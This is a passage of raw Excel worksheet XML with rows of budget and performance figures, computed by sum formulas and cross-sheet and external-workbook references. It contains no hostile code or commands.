      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'18'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>706.547</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'18'!K15</f>
        <v>6212.59</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>120969.09</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]19'!$W$72</f>
        <v>69.0416666666667</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]19'!$X$72</f>
        <v>63.5824947033898</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]19'!$Y$72</f>
        <v>61.443103661299</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]19'!$T$72</f>
        <v>100</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]19'!$U$72</f>
        <v>66.2456140350877</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]19'!$V$72</f>
        <v>51.5885269121813</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]19'!$Q$72</f>
        <v>24.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]19'!$R$72</f>
        <v>302.08</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]19'!$S$72</f>
        <v>4370.58</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'18'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'18'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]19'!$W$73</f>
        <v>64.7916666666667</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]19'!$X$73</f>
        <v>61.0197368421053</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]19'!$Y$73</f>
        <v>62.7861549386415</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]19'!$T$73</f>
        <v>100</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]19'!$U$73</f>
        <v>68</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]19'!$V$73</f>
        <v>53.1905099150142</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]19'!$Q$73</f>
        <v>24.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]19'!$R$73</f>
        <v>310.08</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]19'!$S$73</f>
        <v>4506.30</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'18'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'18'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]19'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]19'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]19'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]19'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]19'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]19'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]19'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]19'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]19'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'18'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'18'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]19'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]19'!$X$74</f>
        <v>216.7</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]19'!$Y$74</f>
        <v>221.938783847826</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]19'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]19'!$U$74</f>
        <v>10.9649122807018</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]19'!$V$74</f>
        <v>7.22296978281397</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]19'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]19'!$R$74</f>
        <v>50</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]19'!$S$74</f>
        <v>611.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'18'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'18'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]19'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]19'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]19'!$Y$72</f>
        <v>9.13888888888889e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]19'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]19'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]19'!$V$72</f>
        <v>4.24929178470255e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]19'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]19'!$R$72</f>
        <v>1.9e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]19'!$S$72</f>
        <v>0.00036</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'18'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'18'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]19'!$W$73</f>
        <v>1e-5</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]19'!$X$73</f>
        <v>133.631062850693</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]19'!$Y$73</f>
        <v>239.247248106786</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]19'!$T$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]19'!$U$73</f>
        <v>0.631583114035088</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]19'!$V$73</f>
        <v>68.2791591123702</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]19'!$Q$73</f>
        <v>1e-6</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]19'!$R$73</f>
        <v>2.880019</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]19'!$S$73</f>
        <v>5784.61036</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]19'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]19'!$E$22</f>
        <v>8105</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'18'!H21</f>
        <v>134958</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2244396</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]19'!$I$22</f>
        <v>8846.68</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'18'!K21</f>
        <v>153752.3</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2220206.3</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]19'!$L$22</f>
        <v>64259.01</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>136.72129787234</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209" t="e">
        <f>'[13]19'!$W$81</f>
        <v>#DIV/0!</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]19'!$X$81</f>
        <v>281.291190028063</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]19'!$Y$81</f>
        <v>275.953276416928</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]19'!$T$81</f>
        <v>0</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]19'!$U$81</f>
        <v>32.4301900584795</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]19'!$V$81</f>
        <v>35.925932483475</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]19'!$Q$81</f>
        <v>0</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]19'!$R$81</f>
        <v>147.881666666667</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]19'!$S$81</f>
        <v>3043.645</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]19'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]19'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'18'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]19'!$I$17</f>
        <v>6162</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'18'!K22</f>
        <v>123891.57</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2015352.95</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]19'!$L$17</f>
        <v>128734.782</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>64.367391</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209" t="e">
        <f>'[13]19'!$W$79</f>
        <v>#DIV/0!</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]19'!$X$79</f>
        <v>101.272448029411</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]19'!$Y$79</f>
        <v>102.20140291832</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]19'!$T$79</f>
        <v>0</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]19'!$U$79</f>
        <v>50.3721978557505</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]19'!$V$79</f>
        <v>45.6474989507921</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]19'!$Q$79</f>
        <v>0</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]19'!$R$79</f>
        <v>229.697222222222</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]19'!$S$79</f>
        <v>3867.25611111111</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]19'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]19'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'18'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]19'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'18'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]19'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209" t="e">
        <f>'[13]19'!$W$80</f>
        <v>#DIV/0!</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]19'!$X$80</f>
        <v>85.0235341281979</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]19'!$Y$80</f>
        <v>79.4479538834802</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]19'!$T$80</f>
        <v>0</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]19'!$U$80</f>
        <v>32.8211500974659</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]19'!$V$80</f>
        <v>32.5132232976603</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]19'!$Q$80</f>
        <v>0</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]19'!$R$80</f>
        <v>149.664444444444</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]19'!$S$80</f>
        <v>2754.52027777778</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]19'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]19'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'18'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]19'!$I$56</f>
        <v>0</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'18'!K24</f>
        <v>25767.79</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>305594.32</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]19'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]19'!$R$6</f>
        <v>87.3220338983051</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]19'!$S$6</f>
        <v>84.1926345609065</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]19'!$T$6</f>
        <v>86.0440445244882</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]19'!$O$6</f>
        <v>61.4583333333333</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]19'!$P$6</f>
        <v>58.0592105263158</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]19'!$Q$6</f>
        <v>52.6283050047214</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]19'!$L$6</f>
        <v>14.75</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]19'!$M$6</f>
        <v>264.75</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]19'!$N$6</f>
        <v>4458.67</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]19'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'18'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]19'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'18'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]19'!$R$7</f>
        <v>172.592592592593</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]19'!$S$7</f>
        <v>196.877338877339</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]19'!$T$7</f>
        <v>188.09639978607</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]19'!$O$7</f>
        <v>56.25</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]19'!$P$7</f>
        <v>52.7412280701754</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]19'!$Q$7</f>
        <v>50.319641170916</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]19'!$L$7</f>
        <v>13.5</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]19'!$M$7</f>
        <v>240.5</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]19'!$N$7</f>
        <v>4263.08</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'18'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'18'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]19'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]19'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]19'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]19'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]19'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]19'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]19'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]19'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]19'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'18'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'18'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]19'!$W$69</f>
        <v>21.8860175357637</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]19'!$X$69</f>
        <v>22.6273168278449</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]19'!$Y$69</f>
        <v>25.2078422382299</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]19'!$T$69</f>
        <v>100</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]19'!$U$69</f>
        <v>79.0175438596491</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]19'!$V$69</f>
        <v>68.947119924457</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]19'!$Q$69</f>
        <v>24.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]19'!$R$69</f>
        <v>360.32</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]19'!$S$69</f>
        <v>5841.20</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'18'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'18'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]19'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]19'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]19'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]19'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]19'!$U$104</f>
        <v>50.6506578947369</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]19'!$V$104</f>
        <v>63.6333451369216</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]19'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]19'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]19'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'18'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'18'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]19'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]19'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]19'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]19'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]19'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]19'!$V$105</f>
        <v>33.0994098205855</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]19'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]19'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]19'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'18'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
